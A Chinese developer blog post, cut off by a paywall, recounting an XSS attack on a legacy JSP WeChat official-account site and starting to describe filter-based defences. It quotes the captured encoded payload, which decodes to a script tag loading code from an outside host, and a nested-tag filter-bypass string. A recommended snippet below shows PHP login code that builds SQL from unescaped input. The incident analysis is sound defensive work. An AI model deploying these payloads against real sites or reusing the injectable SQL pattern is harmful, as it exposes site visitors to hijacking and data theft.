微信公众号之XSS攻击

最新推荐文章于 2024-07-25 13:36:43 发布
最新推荐文章于 2024-07-25 13:36:43 发布
阅读量4.4k 收藏 2
点赞数 1
分类专栏: 微信相关 文章标签: java xss web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cdgm_c/article/details/106301860
版权

目录


最近入职新公司后接手了一个项目,线上遇到一连串微信公众号的问题,都是项目之前留下的坑,之前没有接触过微信开发,踩完坑来记录一下。

XSS攻击

前景提要

公司项目属于比较旧的项目,没有前后端分离,还是用的SSM+JSP的架构,导致接口请求时被注入js脚本恶意跳转,然后被微信封了一批接口(例如https://www.aa.com/bb/cc接口被攻击,以bb为前缀的接口都会被封禁)

之前接触过的项目是前后端分离的,后台接口是REST风格,就算传入参数带有js脚本也造成不了影响(REST接口只向客户端返回数据),所以对XSS攻击没有太多了解,大概是接口做转发时把传入参数带到页面,然后页面对参数进行了一定的解析,遇到标签就执行了里面的代码,比如线上出现的这个恶意转发的问题,访问url被篡改成:

https://www.aa.com/bb/list.do?keyWord=1234abce';location.href%3Dja\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u005b\u0027\u0077\u0072\u0069\u0074\u0065\u0027\u005d\u0028\u0061\u0074\u006f\u0062\u0028\u0027\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0043\u0042\u007a\u0063\u006d\u004d\u0039\u004c\u0079\u0039\u0036\u004d\u0069\u0035\u006b\u0064\u0057\u0039\u0034\u0061\u0069\u0035\u006a\u0062\u0032\u0030\u0076\u0065\u0044\u0034\u0038\u004c\u0033\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0034\u00)3d%5Cu0027%5Cu0029%5Cu0029%5Cu003b%60//&U2FsdGVkX1zzdsgbfh2FHrdW3ZNZs1FOcFbGj59O9LB5LAOCgNzzdsgbfh2F4ptuBX9mEGb3vpzzdsgbfh2BSnd25kgUGphUaOJHIzzdsgbfh2BTPCkXKT0LbtZzzdsgbfh2Bfzzdsgbfh2Bqd3zi9OoMBzK5Xhxz4dBsaUb5JuWw76Vf1hfGimEQ5UkxSUJc99tewtIVsSwzzdsgbfh3Dzzdsgbfh3D&money=16217&from=groupmessage#1589503652828`

一看这个url,里面有location.href,很明显就是被转发了,但后面那一串是什么?我们来解析一下

做个转义加编码转换,得到了下面的:

https://www.aa.com/bb/list.do?keyWord=1234abce';location.href=javascript:document['write'](atob('PHNjcmlwdCBzcmM9Ly96Mi5kdW94ai5jb20veD48L3NjcmlwdD4)3d'));`//&U2FsdGVkX1zzdsgbfh2FHrdW3ZNZs1FOcFbGj59O9LB5LAOCgNzzdsgbfh2F4ptuBX9mEGb3vpzzdsgbfh2BSnd25kgUGphUaOJHIzzdsgbfh2BTPCkXKT0LbtZzzdsgbfh2Bfzzdsgbfh2Bqd3zi9OoMBzK5Xhxz4dBsaUb5JuWw76Vf1hfGimEQ5UkxSUJc99tewtIVsSwzzdsgbfh3Dzzdsgbfh3D&money=16217&from=groupmessage#1589503652828`

看到atob()函数,是BASE64的解密,对PHNjcmlwdCBzcmM9Ly96Mi5kdW94ai5jb20veD48L3NjcmlwdD4)3d解密一下,得到:

<script src=//z2.duoxj.com/x></script>7t

这解析完是不是头大了,还有这种操作,之前看到知乎某个大佬总结XSS攻击的各种js脚本的写法,有一种更绝,预判你的预判,利用过滤后返回语句再次构成攻击语句来绕过,比如这种

http://192.168.1.102/xss/example3.php?name=<sCri<script>pt>alert("hey!")</scRi</script>pt>

,当你把<script>过滤后留下的字符又组成了新的标签<sCript>,真的是强

更多XSS攻击的姿势可见:https://zhuanlan.zhihu.com/p/26177815

问题解决

得,上面讲了一堆细节的,回到问题本身。线上用户访问被封禁的链接后会看到下面这个图
在这里插入图片描述
微信还贴心的提供了申请恢复访问功能,这个申请一般是解决完系统漏洞后再去提交的,如果以前有解决经验可以先申请再修复,因为微信审核还是有点慢的(像我们领导联系了微信内部人员加紧审核,也用了4小时才审核通过)

然后我们来说下解决方法

像我们公司的项目页面用的jsp,可以在通用jsp页面中设置taglib,在标签类中做过滤的逻辑。

标签类一般继承TagSupport,然后重写doStartTag方法,在里面做过滤逻辑,标签类的定制化程度较高,这里就不贴代码了

另一种方法就是在servlet Filter中过滤,一般是重新包装chain.doFilter(ServletRequest var1, ServletResponse var2)中传入的HttpServletRequest,例子如下:

public class
最低0.47元/天 解锁文章
Jet丶丶
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微信公众平台无限回调系统 /user/ajax.php SQL注入漏洞复现
0xSec
07-17 2229
微信公众平台无限回调系统 /user/ajax.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
某公司公众号任意用户注册漏洞利用
李熠专用博客_白帽子一枚,人称低危终结者
09-17 1999
现在大多平台用户注册都采用了手机号注册,通过发送验证码确保手机号的合法性。但是如果处理不当,则可能造成任意手机号注册等漏洞,就比如下面的某公众号。 漏洞利用 漏洞URL: http://wx.xxxx.qjcode.com/app_api/login/register 复现步骤: 进入该公众号,点击个人中心->登录,并切换到注册界面: 点击发送验证码,随便输入验证码,并输入密码,点击确认,用BurpSuit拦截注册接口,爆破注册接口,可使任意手机号注册。 该公众号还存在忘记密码按照同样方式操
XSS攻击经典案例:一个HTML标签引发出微信重大的BUG
09-08 3102
作为一枚技术公众号运营者,写文章,发文章都是日常操作了,但在一次日常的发文中却意外地发现了微信公众号的重大BUG,这究竟是怎么回事呢? 在9月3日当天,鱼头我发了一篇名为《我的<input />不可能这么可爱》的技术文章,本来以为是常规发文,结果有人给我反馈,当点击留言进入公众号文章留言模块的时候,会有BUG: 我愣了1,2,3秒。。。心想:“咦,不对,这不是把 <inp...
【攻防技术】信息收集之公众号自动收集
刘家华(游戏开发)
05-27 548
公众号自动收集的小脚本
公众平台无限回调系统 /user/ajax.php SQL注入漏洞
weixin_43167326的博客
07-18 286
微信公众平台无限回调系统是一种旨在提升企业客户服务体验和运营效率的工具。该系统通过一系列智能化和自动化的功能,帮助企业与用户之间建立更加便捷、高效的沟通桥梁。
关于xss攻击解决方案
susanliy的博客
01-11 2901
如何防止XSS攻击?1.innerHTML —xss攻击2.DOMParser().parseFromString()–性能最差,会受到xss攻击3.Range.createContextualFragment()–会执行内联的script js代码,这个方法尽量不要使用,不安全4.insertAdjacentHTML()–会受到xss攻击5.createContextualFragment ()–安全性能差,会受到xss攻击
JPower-Chat是一款微信公众号管理以及客服坐席聊天平台(Saas系统)
07-04
JPower-Chat是一款微信公众号管理以及客服坐席聊天平台(Saas系统)。开箱即用得客服坐席功能以及公众号配置功能,该项目依赖于JPower开发。JPower 基于SpringCloud(2020.0.4) + SpringBoot(2.5.8) 的微服务快速开发...
基于websocket 的网页公共聊天时的实现
12-28
在公共聊天室场景中,服务器还需要管理用户的身份验证、消息广播(将一条消息发送给所有在线用户)以及可能的安全措施,比如防止跨站脚本攻击(XSS)或SQL注入。 实现WebSocket聊天功能还涉及一些关键概念和技术: 1...
微信小程序源码(带秒杀)
03-08
7. **安全与性能优化**:在项目中,开发者需要注意数据安全,例如防止SQL注入、XSS攻击等。此外,还需考虑性能优化,如缓存策略、数据库索引、异步处理等,确保系统在高并发下仍能稳定运行。 8. **部署与运维**:...
微信h5开发demo
08-14
这包括防止XSS(跨站脚本攻击)、CSRF(跨站请求伪造)等网络攻击,以及对敏感信息如用户密码、支付信息的加密处理。 综上所述,微信H5开发涉及到前端技术的多个方面,包括响应式设计、动态加载、微信特有API的集成...
微信公众号爬取数据
08-30
利用java,依赖包对微信公众号进行数据爬取,对微信木材人爬取作为参考
获取微信公众号config接口注入权限验证的签名
04-10
vue.js引入jssha后,用于获取微信公众号config接口注入权限验证的签名代码,官网下载的签名,本人无法使用,经过修改可用。
基于PHP的最新4合1小说系统源码 (音乐、漫画、视频自动采集).zip
10-10
9. **安全性**:源码中应包含防止SQL注入、XSS攻击等安全措施,确保用户数据安全。使用预处理语句、过滤输入、输出编码等方法可以提升安全性。 10. **响应式设计**:作为一个现代的娱乐系统,应该具有良好的用户...
【攻防演练】【含poc】W微信公众平台回调系统 ajax SQL注入漏洞
最新发布
zzxx191z的博客
07-25 273
微信公众平台回调系统是公众号登录接口租用/出售管理系统,适用场景:H5游戏,H5网站,适用于一切需要公众号登录接口的H5网站。其接口ajax.php存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。title==“公众号无限回调系统”
微信公众号安全测试
qq_39541626的博客
03-16 7109
◆◆ 前 言 ◆◆ 微信公众平台,简称公众号,是腾讯公司于2012年月推出的,曾命名为“官号平台”和“媒体平台”,后改为公众平台,形成了一种独有的移动互联生态系统。 “利用公众账号平台进行自媒体活动,简单来说就是进行一对多的媒体性行为活动,如商家通过申请公众微信服务号通过二次开发展示商家微官网、微会员、微推送、微支付、微活动、微报名、微分享、微名片等,已经形成了一种主流的线上线下微信互动营销方式...
ajax提交sql注入,ajaxpro存在SQL注入漏洞
weixin_39940154的博客
08-05 403
分析下”洞网/”,环境架好后.找到有问题的语句:End IfElseusername=trim(Dvbbs.CheckStr(request("username")))If ajaxPro Then username = unescape(username)End Ifusername带入到查询语句如下:If ChkUserLogin(username,password,mobile,userco...
初级安全入门——XSS注入的原理与利用
weixin_30872733的博客
04-16 802
XSS的简单介绍 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户目的。 XSS危害: 流量劫持 获取用户cookie信息,盗取账号 篡...
XSS攻击与防御方法
weixin_33755557的博客
04-03 368
2019独角兽企业重金招聘Python工程师标准>>> ...
php公众号第三方登录,微信公众号开发小记——3.接入三方登录
05-20
接入第三方登录是让用户方便快捷地使用已有账号登录你的网站或应用程序,提高用户体验的一种方式。本文将介绍如何使用 PHP 实现微信公众号第三方登录。 1. 获取微信授权 首先,需要获取微信用户的授权。具体步骤如下: 1)引导用户打开微信授权页面: ```php $appid = 'your_appid'; $redirect_uri = urlencode('http://yourdomain.com/callback.php'); $scope = 'snsapi_userinfo'; $url = "https://open.weixin.qq.com/connect/oauth2/authorize?appid=$appid&redirect_uri=$redirect_uri&response_type=code&scope=$scope&state=STATE#wechat_redirect"; header("Location: $url"); ``` 其中,`$appid` 是你的微信公众号的 AppID,`$redirect_uri` 是授权后回调的 URL,`$scope` 是授权作用域,可以是 `snsapi_base` 或 `snsapi_userinfo`,`$state` 是自定义参数,用于防止 CSRF 攻击。 2)获取授权码: 用户同意授权后,会重定向到 `$redirect_uri` 指定的 URL,带上授权码 `code` 和 `state` 参数。 ```php $code = $_GET['code']; $state = $_GET['state']; ``` 3)获取 access_token 和 openid: 使用授权码 `code` 获取 `access_token` 和 `openid`。 ```php $access_token_url = "https://api.weixin.qq.com/sns/oauth2/access_token?appid=$appid&secret=$secret&code=$code&grant_type=authorization_code"; $response = file_get_contents($access_token_url); $result = json_decode($response, true); $access_token = $result['access_token']; $openid = $result['openid']; ``` 其中,`$secret` 是你的微信公众号的 AppSecret。 2. 获取用户信息 获取到 `access_token` 和 `openid` 后,可以使用以下代码获取用户信息: ```php $userinfo_url = "https://api.weixin.qq.com/sns/userinfo?access_token=$access_token&openid=$openid&lang=zh_CN"; $response = file_get_contents($userinfo_url); $userinfo = json_decode($response, true); ``` 其中,`$userinfo` 包含用户的昵称、头像等信息。 3. 将用户信息保存到数据库 最后,将获取到的用户信息保存到数据库中,以便下次使用时快速登录。 ```php // 连接数据库 $con = mysqli_connect('localhost', 'username', 'password', 'database'); mysqli_set_charset($con, "utf8"); // 查询用户是否已存在 $sql = "SELECT * FROM users WHERE openid='$openid'"; $result = mysqli_query($con, $sql); if (mysqli_num_rows($result) == 0) { // 用户不存在,插入新用户信息 $nickname = mysqli_real_escape_string($con, $userinfo['nickname']); $headimgurl = mysqli_real_escape_string($con, $userinfo['headimgurl']); $sql = "INSERT INTO users (openid, nickname, headimgurl) VALUES ('$openid', '$nickname', '$headimgurl')"; mysqli_query($con, $sql); } // 保存用户登录状态 $_SESSION['openid'] = $openid; ``` 以上就是使用 PHP 实现微信公众号第三方登录的步骤。需要注意的是,为了确保安全性,应该对用户输入的数据进行过滤和验证,防止 SQL 注入和 XSS 攻击等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值